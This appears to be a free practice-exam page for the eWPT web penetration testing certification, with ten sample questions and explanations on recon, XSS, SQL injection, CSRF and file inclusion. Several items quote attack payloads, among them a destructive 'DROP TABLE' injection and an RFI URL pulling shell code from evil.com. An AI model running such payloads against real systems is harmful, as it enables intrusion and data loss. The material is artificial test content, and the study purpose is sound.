All Practice Exams
100+ Free eWPT Practice Questions
eWPT Web Application Penetration Tester (INE Security) practice questions are available now; exam metadata is being verified.
✓ No registration✓ No credit card✓ No hidden fees✓ Start practicing immediately
100+ Questions
100% Free
1 / 100
Question 1
Score: 0/0
When testing a web application for SSRF (Server-Side Request Forgery), which URL would a tester inject to attempt to access cloud instance metadata?
A
B
C
D
to track
Same family resources
Explore More INE Security (eLearnSecurity) Certifications
Continue into nearby exams from the same family. Each card keeps practice questions, study guides, flashcards, videos, and articles in one place.
2026 Statistics
Key Facts: eWPT Exam
Practical
Exam Format
INE Security
3 years
Certification Validity
INE Security
~$749/yr
INE Premium (includes exam)
INE Security
Browser-based
Exam Environment
INE Security
Auto-graded
Scoring Method
INE Security
6 domains
Content Areas
INE eWPT Blueprint
The eWPT (eWPTv2) from INE Security is a practical, hands-on web application penetration testing certification conducted in a browser-based Kali Linux lab. Candidates must identify and exploit web vulnerabilities (SQLi, XSS, CSRF, IDOR, LFI/RFI, file upload) using industry-standard tools including Burp Suite and SQLMap. Certification is valid 3 years. INE Premium subscription (~$749/year) includes the course and exam. This practice test covers the theoretical knowledge — the real exam requires live exploitation.
Sample eWPT Practice Questions
Try these sample questions to test your eWPT exam readiness. Each question includes a detailed explanation. Start the interactive quiz above for the full 100+ question experience with AI tutoring.
1During a web application penetration test, which phase is typically performed FIRST after scoping is agreed upon?
A.Information gathering and reconnaissance
B.Exploitation of identified vulnerabilities
C.Vulnerability assessment and scanning
D.Report writing and remediation advice
Explanation: Information gathering and reconnaissance is the first technical phase of a web app pentest after pre-engagement. It establishes the attack surface—domains, subdomains, technologies, and entry points—before any analysis or exploitation begins. Testing blindly without recon leads to missed vulnerabilities and wasted effort.
2A tester uses `robots.txt` to enumerate restricted paths on a target web server. Which phase of the OWASP Web Security Testing Guide (WSTG) does this best represent?
A.Information gathering
B.Authentication testing
C.Session management testing
D.Input validation testing
Explanation: Reviewing `robots.txt` is a classic information-gathering technique documented in WSTG-INFO-01. The file often reveals directories the administrator does not want indexed, giving testers a list of potentially sensitive endpoints to probe further.
3Which tool is most commonly used for intercepting and modifying HTTP/HTTPS traffic during a web application pentest?
A.Nmap
B.Metasploit Framework
C.Burp Suite
D.Hydra
Explanation: Burp Suite is the industry-standard web application testing proxy. It intercepts HTTP/HTTPS requests and responses, allowing the tester to inspect, modify, replay, and fuzz web traffic. Its Repeater, Intruder, and Scanner modules cover most web testing activities.
4During web fingerprinting, a tester sends an `OPTIONS` request to the target. Which of the following responses would indicate a misconfiguration worth escalating?
A.HTTP 200 with 'Allow: GET, POST, HEAD'
B.HTTP 405 Method Not Allowed
C.HTTP 200 with 'Allow: GET, POST, PUT, DELETE, TRACE'
D.HTTP 403 Forbidden
Explanation: TRACE and DELETE being enabled via the OPTIONS response indicates dangerous HTTP methods are permitted. TRACE can assist in cross-site tracing (XST) attacks, and DELETE allows file deletion. These methods should be disabled on production servers.
5A tester discovers that a web application reflects user input directly in a script block without encoding: `<script>var user='PAYLOAD';</script>`. Which type of XSS vulnerability is this?
A.Reflected XSS
B.Stored XSS
C.DOM-based XSS
D.Blind XSS
Explanation: Reflected XSS occurs when user-supplied data is immediately echoed back in the server's response without persistent storage. The payload travels from the request directly into the rendered page. The injection point inside a script block means the attacker can break out of the string with `';` and inject arbitrary JavaScript.
6Which SQL injection payload is used to test for time-based blind SQLi on a MySQL backend?
A.' AND SLEEP(5)--
B.' OR 1=1--
C.'; DROP TABLE users;--
D.' UNION SELECT NULL--
Explanation: `AND SLEEP(5)` causes MySQL to pause for 5 seconds if the injection point is evaluated, confirming a boolean-true condition without any visible output. This is the standard time-based blind technique: if the response is delayed, injection is present.
7Which Gobuster command correctly brute-forces directories on a target web application using a wordlist?
A.gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
B.gobuster dns -d target.com -w /usr/share/wordlists/dirb/common.txt
C.gobuster vhost -u http://target.com -w wordlist.txt
D.gobuster fuzz -u http://target.com/FUZZ -w wordlist.txt
Explanation: `gobuster dir` mode performs directory and file brute-forcing. The `-u` flag sets the target URL, and `-w` specifies the wordlist. This is the primary command for enumerating hidden paths on web servers during recon.
8A web application stores session tokens in cookies without the `HttpOnly` flag set. What attack does this primarily enable?
A.SQL injection via cookie manipulation
B.Session fixation attacks
C.Cross-site scripting theft of session cookies
D.CSRF token bypass
Explanation: The `HttpOnly` flag prevents JavaScript from reading a cookie via `document.cookie`. Without it, an XSS payload can steal the session token and send it to the attacker, enabling session hijacking. This is why HttpOnly is a critical defence against XSS-based session theft.
9Which attack technique allows an attacker to include a remote file hosted on an attacker-controlled server into a PHP application?
A.Remote File Inclusion (RFI)
B.Local File Inclusion (LFI)
C.Server-Side Template Injection (SSTI)
D.Path Traversal
Explanation: Remote File Inclusion (RFI) exploits PHP functions like `include()` or `require()` that accept user-controlled paths. When the application fetches a URL pointing to an attacker's server (e.g., `?page=http://evil.com/shell.php`), it executes the remote PHP code, leading to remote code execution.
10During a CSRF vulnerability assessment, which HTTP request characteristic is the MOST important to verify as absent?
A.Absence of a valid anti-CSRF token in the request
B.Absence of the Content-Type header
C.Absence of HTTPS in the request URL
D.Absence of the User-Agent header
Explanation: CSRF attacks work by tricking a browser into making an authenticated request on behalf of a victim. The primary defence is an unpredictable anti-CSRF token (synchronized token pattern or double-submit cookie). If the server does not validate a CSRF token in state-changing requests, the endpoint is vulnerable.
About the eWPT Practice Questions
Verified exam format metadata for eWPT Web Application Penetration Tester (INE Security) is pending. The practice questions above remain available while official exam length, timing, passing score, fee, and administrator details are reviewed.